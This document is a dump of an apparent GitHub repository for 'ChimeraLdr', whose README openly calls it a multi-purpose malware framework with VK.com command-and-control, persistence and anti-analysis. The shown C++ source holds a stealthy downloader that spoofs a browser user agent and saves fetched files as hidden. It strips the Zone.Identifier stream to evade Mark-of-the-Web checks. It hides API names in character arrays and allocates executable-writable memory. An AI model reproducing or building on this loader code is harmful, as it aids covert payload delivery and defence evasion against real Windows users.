-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/Chimera.tlog/link.write.1.tlog -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.vcxproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\malpwn\Documents\github_stuff\ChimeraLdr\Release\Chimera.exe 2 | -------------------------------------------------------------------------------- /ChimeraLdr/Release/Control.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/Control.obj -------------------------------------------------------------------------------- /ChimeraLdr/Release/Install.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/Install.obj -------------------------------------------------------------------------------- /ChimeraLdr/Release/global.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/global.obj -------------------------------------------------------------------------------- /ChimeraLdr/Release/memory.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/memory.obj -------------------------------------------------------------------------------- /ChimeraLdr/Release/urlsaver.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/urlsaver.obj -------------------------------------------------------------------------------- /ChimeraLdr/Release/utils.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/utils.obj -------------------------------------------------------------------------------- /ChimeraLdr/Release/vc142.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/vc142.pdb -------------------------------------------------------------------------------- /ChimeraLdr/Release/vcpkg.applocal.log: -------------------------------------------------------------------------------- 1 |  2 | -------------------------------------------------------------------------------- /ChimeraLdr/global.cpp: -------------------------------------------------------------------------------- 1 | #include "global.h" 2 | 3 | CONST WCHAR CONFIG::ProjectName[] = L"ChimeraLdr"; 4 | -------------------------------------------------------------------------------- /ChimeraLdr/global.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | 7 | #pragma comment(lib, "wininet.lib") 8 | 9 | static CONST DWORD RandomDirectoryLen = 6; 10 | static CONST DWORD MAX_ELEVATE_TRIES = 3; 11 | 12 | 13 | #define WATERMARK "Chmldr" 14 | #define ENDWATERMARK "hCmldr" 15 | 16 | namespace CONFIG 17 | { 18 | extern CONST WCHAR ProjectName[]; 19 | } 20 | #include "mydbg.h" 21 | #include "memory.h" 22 | #include "utils.h" 23 | #include "Install.h" 24 | #include "Control.h" 25 | #include "urlsaver.h" 26 | 27 | #pragma warning(disable : 4996) -------------------------------------------------------------------------------- /ChimeraLdr/memory.cpp: -------------------------------------------------------------------------------- 1 | #include "global.h" 2 | 3 | 4 | GlobalMemory::GlobalMemory(DWORD MemSize) 5 | { 6 | if ((!this->pStart) && (!this->pTop)) 7 | { 8 | this->dwSize = MemSize; 9 | this->pStart = (PBYTE)VirtualAlloc(0, MemSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 10 | this->pTop = this->pStart; 11 | this->dwReserved = 0; 12 | if (!this->pStart) 13 | dbg("Memory manager: error allocating memory page"); 14 | } 15 | else dbg("Memory manager: memory already allocated in this scope"); 16 | } 17 | 18 | GlobalMemory::~GlobalMemory() 19 | { 20 | VirtualFree(this->pStart, 0, MEM_RELEASE); 21 | } 22 | 23 | LPVOID GlobalMemory::localloc(DWORD MemSize) 24 | { 25 | if ((this->pStart) && ((this->dwReserved + MemSize) < this->dwSize)) 26 | { 27 | LPVOID ret = this->pTop; 28 | this->pTop += MemSize; 29 | this->dwReserved += MemSize; 30 | return ret; 31 | } 32 | else dbg("Memory manager: there is no allocated memory to reserve"); 33 | return NULL; 34 | } -------------------------------------------------------------------------------- /ChimeraLdr/memory.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/memory.h -------------------------------------------------------------------------------- /ChimeraLdr/mydbg.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "global.h" 4 | 5 | void _inline dbg(LPCWSTR str, LPCWSTR str2 = NULL) 6 | { 7 | #ifdef _DEBUG 8 | INT len2 = (str != NULL) ? lstrlenW(str2) : 0; 9 | LPWSTR s = (LPWSTR)VirtualAlloc(0, (lstrlenW(str) + len2 + lstrlenW(CONFIG::ProjectName)) * 2 + 10, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 10 | if (s) 11 | { 12 | wsprintfW(s, L"%s: %s", CONFIG::ProjectName, str); 13 | 14 | if (str2) 15 | { 16 | lstrcatW(s, str2); 17 | } 18 | 19 | OutputDebugStringW(s); 20 | 21 | VirtualFree(s, 0, MEM_RELEASE); 22 | } 23 | else 24 | MessageBoxW(0, L"ERROR IN dbg ROUTINE", L"FATAL ERROR", MB_ICONERROR); 25 | 26 | 27 | #endif 28 | } 29 | 30 | void _inline dbg(LPCSTR str, LPCSTR str2 = NULL) 31 | { 32 | 33 | 34 | INT len2 = (str != NULL) ? lstrlenA(str2) : 0; 35 | LPWSTR s = (LPWSTR)VirtualAlloc(0, (lstrlenA(str) + len2 + 10) * 2, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 36 | if (s) 37 | { 38 | LPWSTR s2 = (s + lstrlenA(str) * 2 + 1); 39 | 40 | wsprintfW(s, L"%S", str); 41 | if (str2) 42 | wsprintfW(s2, L"%S", str2); 43 | else 44 | s2 = NULL; 45 | 46 | dbg(s, s2); 47 | 48 | VirtualFree(s, 0, MEM_RELEASE); 49 | } 50 | 51 | } 52 | 53 | void _inline dbg(DWORD str) 54 | { 55 | 56 | LPWSTR s = (LPWSTR)VirtualAlloc(0, 512, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 57 | wsprintfW(s, L"%d", str); 58 | dbg(s); 59 | VirtualFree(s, 0, MEM_RELEASE); 60 | 61 | } -------------------------------------------------------------------------------- /ChimeraLdr/urlsaver.cpp: -------------------------------------------------------------------------------- 1 | #include "global.h" 2 | 3 | Downloader::Downloader() 4 | { 5 | 6 | WCHAR szUserAgent[] = 7 | { 8 | L'M', L'o', L'z', L'i', L'l', L'l', L'a', 9 | L'/', L'5', L'.', L'0', L' ', L'(', L'W', L'i', 10 | L'n', L'd', L'o', L'w', L's', L' ', L'N', 11 | L'T', L' ', L'6', L'.', L'1', L';', L' ', 12 | L'W', L'O', L'W', L'6', L'4', L')', L' ', 13 | L'A', L'p', L'p', L'l', L'e', L'W', L'e', 14 | L'b', L'K', L'i', L't', L'/', L'5', L'3', 15 | L'7', L'.', L'3', L'6', L' ', L'(', L'K', 16 | L'H', L'T', L'M', L'L', L',', L' ', L'l', L'i', 17 | L'k', L'e', L' ', L'G', L'e', L'c', L'k', 18 | L'o', L')', L' ', L'C', L'h', L'r', L'o', 19 | L'm', L'e', L'/', L'5', L'5', L'.', L'0', 20 | L'.', L'2', L'8', L'8', L'3', L'.', L'8', 21 | L'7', L' ', L'S', L'a', L'f', L'a', L'r', 22 | L'i', L'/', L'5', L'3', L'7', L'.', L'3', 23 | L'6', L'\0' 24 | }; 25 | 26 | 27 | this->hInternet = InternetOpenW(szUserAgent, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0); 28 | 29 | if (!this->hInternet) 30 | { 31 | dbg("Loader http warn: Can not retrieve INTERNET handle with OPEN_TYPE_DIRECT"); 32 | dbg("Loader http info: trying to use preconfigured proxy server"); 33 | 34 | this->hInternet = InternetOpenW(L"Mozilla", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, INTERNET_FLAG_ASYNC); 35 | if (!this->hInternet) 36 | { 37 | dbg("Loader http error: Error: can not retrieve INTERNET handle"); 38 | } 39 | } 40 | } 41 | 42 | Downloader::~Downloader() 43 | { 44 | if (this->hInternet) 45 | { 46 | InternetCloseHandle(this->hInternet); 47 | } 48 | else 49 | dbg("Loader warn: internet was not initialized. Nothing to free"); 50 | } 51 | 52 | BOOL Downloader::save(LPWSTR from, LPWSTR to) 53 | { 54 | if (!this->hInternet) 55 | { 56 | dbg("Loader error: can not download file because of internet unitialized"); 57 | return FALSE; 58 | } 59 | 60 | INT Tries = 0; 61 | BOOL ret = TRUE; 62 | do 63 | { 64 | this->hFile = InternetOpenUrlW(this->hInternet, from, 0, 0, INTERNET_FLAG_NO_CACHE_WRITE, 0); 65 | Tries++; 66 | } while ((Tries != 5) && (!this->hFile)); 67 | 68 | if ((Tries == 5) && (!this->hFile)) 69 | { 70 | dbg("Loader error: max connection tries reached. Can not retrieve url: "); 71 | dbg(from); 72 | return FALSE; 73 | } 74 | 75 | GlobalMemory MyMem(1025); 76 | LPVOID pData = MyMem.localloc(1024); 77 | DWORD dwRead; 78 | 79 | Tries = 0; 80 | 81 | HANDLE hLocal = CreateFileW(to, GENERIC_WRITE, FILE_SHARE_READ, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_HIDDEN, 0); 82 | 83 | if (hLocal != INVALID_HANDLE_VALUE) 84 | { 85 | DWORD dwWritten; 86 | while (InternetReadFile(this->hFile, pData, 1024, &dwRead) == TRUE) 87 | { 88 | if (!dwRead) 89 | break; 90 | 91 | if (!WriteFile(hLocal, pData, dwRead, &dwWritten, 0)) 92 | { 93 | dbg("Loader error: can not write in file"); 94 | dbg(to); 95 | } 96 | 97 | Tries++; 98 | } 99 | if ((!Tries) && (dwRead == 0)) 100 | { 101 | dbg("Loader error: error reading file"); 102 | ret = FALSE; 103 | } 104 | 105 | CloseHandle(hLocal); 106 | 107 | GlobalMemory ntfs(600); 108 | LPWSTR ZoneIdentifier = (LPWSTR)ntfs.localloc(598); 109 | wsprintfW(ZoneIdentifier, L"%s:Zone.Identifier", to); 110 | DeleteFileW(ZoneIdentifier); 111 | 112 | 113 | } 114 | else 115 | { 116 | dbg("Can not create file: "); 117 | dbg(to); 118 | ret = FALSE; 119 | } 120 | InternetCloseHandle(this->hFile); 121 | 122 | return ret; 123 | } -------------------------------------------------------------------------------- /ChimeraLdr/urlsaver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | 6 | class Downloader 7 | { 8 | public: 9 | Downloader(); 10 | BOOL save(LPWSTR from, LPWSTR to); 11 | ~Downloader(); 12 | private: 13 | HINTERNET hFile; 14 | HINTERNET hInternet; 15 | }; 16 | 17 | -------------------------------------------------------------------------------- /ChimeraLdr/utils.cpp: -------------------------------------------------------------------------------- 1 | #include "global.h" 2 | 3 | 4 | 5 | typedef BOOL(WINAPI * CryptGenRandom_proto)(HCRYPTPROV, DWORD, LPBYTE); 6 | 7 | BOOL GenerateRandomString(PWCHAR pRandomString, DWORD dwRandomLen) 8 | { 9 | BOOL bRet = FALSE; 10 | 11 | HCRYPTPROV hProv; 12 | 13 | 14 | if (CryptAcquireContext(&hProv, 0, 0, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT)) 15 | { 16 | WCHAR Alphabet[27]; 17 | for (DWORD i = 0; i < 26; i++) 18 | Alphabet[i] = L'a' + i; 19 | 20 | GlobalMemory MyMem(dwRandomLen + 1); 21 | 22 | LPBYTE pRandomIndexes = (LPBYTE)MyMem.localloc(dwRandomLen); 23 | 24 | if (!pRandomIndexes) 25 | { 26 | dbg("No memory in random generator"); 27 | CryptReleaseContext(hProv, 0); 28 | return FALSE; 29 | } 30 | CHAR CryptGenRandomName[] = { 'C', 'r', 'y', 'p', 't', 'G', 'e', 'n', 'R', 'a', 'n', 'd', 'o', 'm', '\0' }; 31 | CHAR AdvapiName[] = { 'A', 'd', 'v', 'a', 'p', 'i', '3', '2', '.', 'd', 'l', 'l', '\0' }; 32 | 33 | HMODULE hAdvapi = GetModuleHandleA(AdvapiName); 34 | if (!hAdvapi) 35 | hAdvapi = LoadLibraryA(AdvapiName); 36 | 37 | if (hAdvapi) 38 | { 39 | CryptGenRandom_proto CryptGenRandomFunc = (CryptGenRandom_proto)GetProcAddress(hAdvapi, CryptGenRandomName); 40 | if (CryptGenRandomFunc) 41 | { 42 | if (CryptGenRandomFunc(hProv, dwRandomLen, pRandomIndexes)) 43 | { 44 | for (DWORD i = 0; i < dwRandomLen; i++) 45 | { 46 | pRandomString[i] = Alphabet[pRandomIndexes[i] % 26]; 47 | } 48 | bRet = TRUE; 49 | } 50 | else 51 | dbg("CryptGenRandom failed"); 52 | } 53 | else 54 | dbg("CryptGenRandom not found in advapi"); 55 | } 56 | else 57 | dbg("Advapi32.dll not found"); 58 | 59 | CryptReleaseContext(hProv, 0); 60 | } 61 | else 62 | { 63 | dbg("CryptAquireContext error"); 64 | } 65 | 66 | 67 | return bRet; 68 | } 69 | 70 | BOOL isDllFlag(PIMAGE_DOS_HEADER pDosHead) 71 | { 72 | PIMAGE_NT_HEADERS pNt = (PIMAGE_NT_HEADERS)((DWORD)pDosHead + (DWORD)pDosHead->e_lfanew); 73 | PIMAGE_FILE_HEADER pFileHead = (PIMAGE_FILE_HEADER)&pNt->FileHeader; 74 | return (pFileHead->Characteristics & IMAGE_FILE_DLL); 75 | } 76 | 77 | BOOL SetDllFlag(PIMAGE_DOS_HEADER pDosHead) 78 | { 79 | if (pDosHead->e_magic != 0x5A4D) 80 | { 81 | dbg("is not PE file"); 82 | return FALSE; 83 | } 84 | PIMAGE_NT_HEADERS pNt = (PIMAGE_NT_HEADERS)((DWORD)pDosHead + (DWORD)pDosHead->e_lfanew); 85 | PIMAGE_FILE_HEADER pFileHead = (PIMAGE_FILE_HEADER)&pNt->FileHeader; 86 | 87 | pFileHead->Characteristics |= IMAGE_FILE_DLL; 88 | return TRUE; 89 | } 90 | 91 | BOOL IsLibrary(HMODULE SelfModule) 92 | { 93 | if (SelfModule) 94 | { 95 | PIMAGE_DOS_HEADER pDosHead = (PIMAGE_DOS_HEADER)SelfModule; 96 | if (isDllFlag(pDosHead)) 97 | { 98 | return TRUE; 99 | } 100 | } 101 | else 102 | { 103 | dbg("Error GetModuleHandleEx HMODULE NULL"); 104 | } 105 | 106 | return FALSE; 107 | } -------------------------------------------------------------------------------- /ChimeraLdr/utils.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | BOOL IsLibrary(HMODULE SelfModule); 4 | BOOL SetDllFlag(PIMAGE_DOS_HEADER pDosHead); 5 | BOOL GenerateRandomString(PWCHAR pRandomString, DWORD dwRandomLen); -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 |
3 |
4 | 5 | Logo 6 | 7 | 8 |

Chimera Loader

9 | 10 |

11 | Multi-purpose malware / updater framework 12 |

13 |
14 | 15 | 16 | ## About The Project 17 | 18 | Chimera loader previously Strator currently serving as a vk.com loader has the potential to serve as either a windows based malware / implant base or a 3rd party software updater module depends on how the user leverages it and modifies it 19 | 20 | Features: 21 | 22 | * VK.com C&C 23 | * HTTP / HTTPS based stealthy communication 24 | * Persistence 25 | * Highly modular 26 | * Tiny size 27 | * Anti-Analysis 28 | 29 | 30 | 31 | ## Have questions ? 32 | 33 | Contact: Souhardya@protonmail.com 34 | --------------------------------------------------------------------------------